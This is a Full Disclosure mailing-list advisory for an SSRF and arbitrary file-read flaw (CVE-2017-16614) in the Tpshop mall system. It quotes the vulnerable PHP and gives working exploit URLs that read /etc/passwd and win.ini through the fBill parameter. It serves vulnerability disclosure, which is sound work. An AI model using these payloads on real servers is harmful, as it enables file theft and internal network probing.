[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] =?gb2312?b?U1NSRqOoU2VydmVyIFNpZGUgUmVxdWVzdCBGb3JnZXJ5o6kg?= =?gb2312?b?aW4gVHBzaG9wIDw9IDIuMC
From: "service () baimaohui ! net" <service () baimaohui ! net>
Date: 2018-03-29 11:40:59
Message-ID: 2018032919405918404913 () baimaohui ! net+E95355A8E30FC710
[Download RAW message or body]
# SSRF£¨Server Side Request Forgery£© in Tpshop <= 2.0.6 (CVE-2017-16614)
The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen \
Leopard Network Co., Ltd.This system is based on the Thinkphp development framework.
## Product Download: http://www.tp-shop.cn/Index/Index/download.html
## Vulnerability Type£ºSSRF£¨Server Side Request Forgery£©
## Attack Type : Remote
## Vulnerability Description
Tpshop¡¯s former version 2.0.6 is vulnerable to SSRF£¨Server Side Request Forgery£© in the \
fBill parameter within the "/plugins/payment/weixin/lib/WxPay.tedatac.php?fBil=" path. This \
vulnerability can lead to arbitrary files reading, network port scanning£¬information \
detection, internal network server attack.
The vulnerability code:
if($_GET['fBill'] && $_GET['WxPayDataBase'])
{
header('Content-type: image/jpeg');
$handle = fopen($_GET['fBill'], 'r');
fseek($handle , $_GET['WxPayDataBase']);
fpassthru($handle);
}
## Exploit
http://tpshop_path/plugins/payment/weixin/lib/WxPay.tedatac.php?fBill=file:///c:/windows/win.ini&WxPayDataBase=test
modify the above fBill parameter£¬example:
request http protocol: fBill=http://www.google.com
request https protocol: fBill=https://www.google.com
request ftp protocol: fBill=ftp://www.google.com
file read£ºfBil=file:///etc/passwd or fBil=file:///c:/windows/win.ini
## Versions
Tpshop <= 2.0.6
## Impact
SSRF(Server Side Request Forgery) in Tpshop before version 2.0.6 allow remote attackers to \
arbitrary files read£¬scan network port£¬information detection,internal network server attack.
## Credit
This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer \
Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16614
service@baimaohui.net
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic